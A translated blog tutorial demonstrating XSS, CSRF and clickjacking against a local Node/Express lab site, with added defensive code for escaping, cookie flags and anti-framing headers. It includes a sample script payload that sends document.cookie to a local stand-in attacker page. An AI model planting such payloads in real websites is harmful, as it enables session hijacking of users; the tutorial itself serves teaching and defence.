2. Web Security (XSS/CSRF) Simple Attack Principles and Defense Schemes (Hands-On)

Introduction: I was learning Node recently, and along the way I wrote examples and solutions for web security attacks. After consulting some material I thought it through myself; the code is not very polished and my Node is still at the exploration stage, so please bear with me. I hope it helps students who are not very familiar with security and whose background knowledge is unclear.

For the defenses, see the previous (theory) article; here we mainly demonstrate the attack principles.

Code: git@github.com:StyLanQP/web-Safe.git

GitHub address: github.com/StyLanQP/we…

The project is laid out as follows:

app: the normal website
hack: the website that simulates the attacker
Technologies used: node + express + react + mysql

Project Introduction

1. Code directory


2. Create the database

First run node app/mysql.js; this script creates the tables and the seed data, as the screenshots show.

1. XSS (Cross-Site Scripting) attack

Principle: an attacker injects malicious, executable script into a web page. When a user browses that page, the embedded script runs in the user's browser, so the attacker can steal user information or otherwise violate the user's privacy.

1. Run the project with npm run start and open the home page.

The home page is rendered from a React template, and React DOM escapes string content during rendering, so a tag supplied as a string is not interpreted as an HTML tag and the injected script cannot execute.

So a page xss.html rendered with an ejs template was added: whether the script tag is supplied in the URL, e.g. http://localhost:4000/xss?text=, or read directly from the code stored in the database, it is executed.

2. Next, attack using document.cookie: following the same steps as before, swap the injected tag for one that reads document.cookie.

Open http://localhost:4000/xss and you will see a request made to http://localhost:5000/xss.html.

In the console you can see that the attacker's site on port 5000 has already printed the cookie; with that cookie, one can simply set it in the console and log in to the site directly.
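As an added example (not code from the web-Safe repository), the following Node snippet reproduces the difference the two pages above show: the same string rendered raw, as the EJS page does with <%- %>, versus escaped, as React DOM and EJS's <%= %> do, plus the Set-Cookie flags that keep an injected script from reading the session cookie at all. The functions escapeHtml, renderXssPage, containsScriptTag and sessionCookieHeader and the PAYLOAD string are constructed for this illustration.

```javascript
// Added example, not from the StyLanQP/web-Safe repo: why the same string is
// executable on the EJS page but inert on the React page, and which cookie
// flag keeps document.cookie empty even when an injection does run.

// Escape the five characters that let text break out of an HTML text node or
// attribute. This is the same mapping EJS applies for <%= %> output.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Build the xss page body. `raw: true` reproduces the vulnerable <%- text %>
// behaviour described in the post; the default escapes, as React DOM does.
function renderXssPage(text, { raw = false } = {}) {
  const body = raw ? text : escapeHtml(text);
  return `<!doctype html><html><body><div id="content">${body}</div></body></html>`;
}

// Does the rendered page contain a live <script> element? A crude check, but
// it is exactly the difference between the two rendering modes above.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Set-Cookie header for the session. HttpOnly makes document.cookie omit the
// value, so a script that does run cannot ship it to port 5000; SameSite=Lax
// additionally keeps the cookie off the cross-site POST used in the CSRF section.
function sessionCookieHeader(sessionId) {
  return `sid=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; SameSite=Lax`;
}

// Constructed payload in the shape the post describes: a script that sends
// document.cookie to the attacker's page on port 5000.
const PAYLOAD =
  '<script>new Image().src="http://localhost:5000/xss.html?c="+document.cookie</script>';

console.log('raw page has <script> :', containsScriptTag(renderXssPage(PAYLOAD, { raw: true })));
console.log('escaped page has <script>:', containsScriptTag(renderXssPage(PAYLOAD)));
console.log('Set-Cookie:', sessionCookieHeader('abc123'));
```

Escaping on output is the fix for the reflected and stored cases alike, because both end up in the same template; HttpOnly is defence in depth for the cookie specifically and does nothing for the rest of what an injected script can do.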

2. CSRF (Cross-Site Request Forgery)

Principle: lure the user into opening the attacker's site; from that site, use the user's logged-in state to issue cross-site requests.

1. While logged in, open the localhost:5000/csrf.html page. In the console we see a setDataList request, which is the endpoint that submits content, and on the port-4000 home page the content has changed.

The legitimate site's content has been altered.

Solution: generate a token, and have the endpoint carry a nonce and a timestamp.


3. Clickjacking

Principle: after the user logs in to site A, the attacker lures them into opening a third-party site, which embeds site A's page through an iframe. When the user clicks a (disguised) button on the third-party site, they are actually clicking a button on site A.

1. Open http://localhost:5000/clickHijack.html and click the button; you are actually clicking the Follow button on http://localhost:4000/home, because the iframe embeds the port-4000 page.


Solution: restrict iframe embedding.

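One way to apply that restriction on the port-4000 site, as an added example and not the repository's own code: send the X-Frame-Options header and the CSP frame-ancestors directive, derived from an allowlist of origins that may frame the page. The framingHeaders and antiClickjacking functions, the allowlist argument and the stand-in response object are assumptions for this illustration; the header names and values are the standard ones.

```javascript
// Added example, not from the StyLanQP/web-Safe repo: response headers that
// stop the attacker's clickHijack.html from framing http://localhost:4000/home.

// Compute the two headers from an allowlist. [] means "never frame me";
// ['self'] allows only same-origin framing; other entries are origins.
function framingHeaders(allowedOrigins = []) {
  const headers = {};
  if (allowedOrigins.length === 0) {
    headers['X-Frame-Options'] = 'DENY';
    headers['Content-Security-Policy'] = "frame-ancestors 'none'";
  } else if (allowedOrigins.length === 1 && allowedOrigins[0] === 'self') {
    headers['X-Frame-Options'] = 'SAMEORIGIN';
    headers['Content-Security-Policy'] = "frame-ancestors 'self'";
  } else {
    // X-Frame-Options cannot express an allowlist (ALLOW-FROM is obsolete), so
    // only CSP carries it; browsers that honour frame-ancestors ignore XFO anyway.
    const sources = allowedOrigins.map((o) => (o === 'self' ? "'self'" : o)).join(' ');
    headers['Content-Security-Policy'] = `frame-ancestors ${sources}`;
  }
  return headers;
}

// Express-style middleware (assumption: res.setHeader exists, as in Node's http).
// Mount it before the routes so every response on port 4000 carries the headers.
function antiClickjacking(allowedOrigins) {
  const headers = framingHeaders(allowedOrigins);
  return (req, res, next) => {
    for (const [name, value] of Object.entries(headers)) res.setHeader(name, value);
    next();
  };
}

// Minimal stand-in for res so the middleware can be exercised without a server.
function applyTo(allowedOrigins) {
  const set = {};
  const res = { setHeader: (name, value) => { set[name] = value; } };
  let nextCalled = false;
  antiClickjacking(allowedOrigins)({}, res, () => { nextCalled = true; });
  return { headers: set, nextCalled };
}

console.log(applyTo([]).headers);
console.log(applyTo(['self', 'https://partner.example']).headers);
```

For the demo site the empty allowlist is the right choice: nothing legitimate frames /home, so DENY plus frame-ancestors 'none' closes the iframe path the attack relies on while still allowing the page to be opened directly.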

References

Anti-replay attacks based on timestamp and nonce

Problems introduced by the HTTP security header X-Content-Type-Options

Teacher Xia's web security videos, sent by a friend; the link cannot be included

web security csrf defense and attack


Source: juejin.im/post/6953059119561441287